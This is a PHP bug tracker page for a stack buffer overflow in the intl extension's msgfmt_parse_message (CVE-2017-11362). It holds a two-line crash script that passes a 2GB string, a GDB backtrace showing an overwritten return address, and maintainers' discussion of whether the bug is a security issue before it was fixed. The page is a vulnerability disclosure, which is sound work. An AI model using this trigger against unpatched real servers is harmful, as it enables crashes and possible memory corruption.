PHP :: Bug #73473 :: Stack Buffer Overflow in msgfmt_parse

Bug #73473	Stack Buffer Overflow in msgfmt_parse_message
Submitted:	2016-11-07 10:40 UTC	Modified:	2018-01-15 13:48 UTC
From:	emmanuel dot law at gmail dot com	Assigned:	stas (profile)
Status:	Closed	Package:	intl (PECL)
PHP Version:	7.0.12	OS:	*
Private report:	No	CVE-ID:	2017-11362

View Developer Edit

Welcome back! If you're the original bug submitter, here's where you can edit the bug or add additional notes.
If you forgot your password, you can retrieve your password here.

Password:

Status:
Package:
Bug Type:
Summary:
From:	emmanuel dot law at gmail dot com
New email:
PHP Version:		OS:

New Comment:

[2016-11-07 10:40 UTC] emmanuel dot law at gmail dot com

Description:
------------
There exist a stack overflow when parsing locale in msgfmt_parse_message(). The vulnerability is being triggered in line 142 where an overtly long slocale is being passed into libicu's umsg_open().

//php-7.0.12/ext/intl/msgformat/msgformat_parse.c
90 PHP_FUNCTION( msgfmt_parse_message )
91 {
92     UChar      *spattern = NULL;
93     int         spattern_len = 0
....
141     /* Create an ICU message formatter. */
142     MSG_FORMAT_OBJECT(mfo) = umsg_open(spattern, spattern_len, slocale, NULL, &INTL_DATA_ERROR_CODE(mfo));





Test script:
---------------
<?php
 ini_set('memory_limit', -1);
 
 $boom  = str_repeat("A",2147483647+1);
 msgfmt_parse_message($boom,"ABC","EFG");

Actual result:
--------------
./php-7.0.12 test.php
Segmentation fault

====Digging into GDB====

gdb-peda$ continue
Continuing.
Program received signal SIGSEGV, Segmentation fault.
Stopped reason: SIGSEGV

gdb-peda$ backtrace
#0  __strcpy_sse2_unaligned () at ../sysdeps/x86_64/multiarch/strcpy-sse2-unaligned.S:241
#1  0x00007ffff382368c in strcpy (__src=0x7fff6d400018 'A' <repeats 200 times>...,
    __dest=0x7fffffffa29d 'A' <repeats 200 times>...)
    at /usr/include/x86_64-linux-gnu/bits/string3.h:104
#2  icu_52::Locale::Locale (this=0x7fffffffa420,
    newLanguage=0x7fff6d400018 'A' <repeats 200 times>..., newCountry=0x0,
    newVariant=0x0, newKeywords=0x0) at locid.cpp:336
#3  0x4141414141414141 in ?? ()
#4  0x4141414141414141 in ?? ()
#5  0x4141414141414141 in ?? ()
#6  0x4141414141414141 in ?? ()
#7  0x4141414141414141 in ?? ()
#8  0x4141414141414141 in ?? ()
#9  0x4141414141414141 in ?? ()
.......
.....

Patches

Pull Requests

History

AllCommentsChangesGit/SVN commitsRelated reports

[2016-11-07 10:49 UTC] emmanuel dot law at gmail dot com

Here's my proposed patch:

https://gist.github.com/libnex/4f3382725b4020763af64c9a5e6acf5e

[2016-11-18 14:41 UTC] krakjoe@php.net

-Type: Security +Type: Bug

[2016-11-18 14:41 UTC] krakjoe@php.net

This issue does not meet the criteria to be considered a security issue.

Please review: https://wiki.php.net/security

[2016-11-18 15:45 UTC] emmanuel dot law at gmail dot com

Isn't this similar to bug #73218 which was considered a security bug? Just wondering,

[2017-06-02 22:01 UTC] nikic@php.net

@krakjoe: The security policy could use some clarification as to how length overflow bugs are classified. Right now both "low severity" and "not a security issue" could apply and I don't think we're handling these consistently.

[2017-06-02 22:06 UTC] nikic@php.net

Automatic comment on behalf of emmanuel.law@gmail.com
Revision: http://git.php.net/?p=php-src.git;a=commit;h=95c4564f939c916538579ef63602a3cd31941c51
Log: Fixed bug #73473: Stack Buffer Overflow in msgfmt_parse_message

[2017-06-02 22:06 UTC] nikic@php.net

-Status: Open +Status: Closed

[2017-07-17 22:55 UTC] emmanuel dot law at gmail dot com

MITRE has assigned this CVE-2017-11362

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11362

[2017-07-17 22:55 UTC] emmanuel dot law at gmail dot com

MITRE has assigned this CVE-2017-11362

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11362

[2017-07-18 05:39 UTC] stas@php.net

-Assigned To: +Assigned To: stas

[2017-07-18 05:39 UTC] stas@php.net

I have no idea why this one was issued a CVE, it's not a security issue. Looks like practice of assigning CVEs to projects without any consultation with developers continues. Sigh.

[2018-01-15 13:48 UTC] kaplan@php.net

-CVE-ID: +CVE-ID: 2017-11362

	php.net \| support \| documentation \| report a bug \| advanced search \| search howto \| statistics \| random bug \| login
go to bug id or search bugs for


Copyright © 2001-2025 The PHP Group All rights reserved.	Last updated: Wed Jan 29 20:02:31 2025 UTC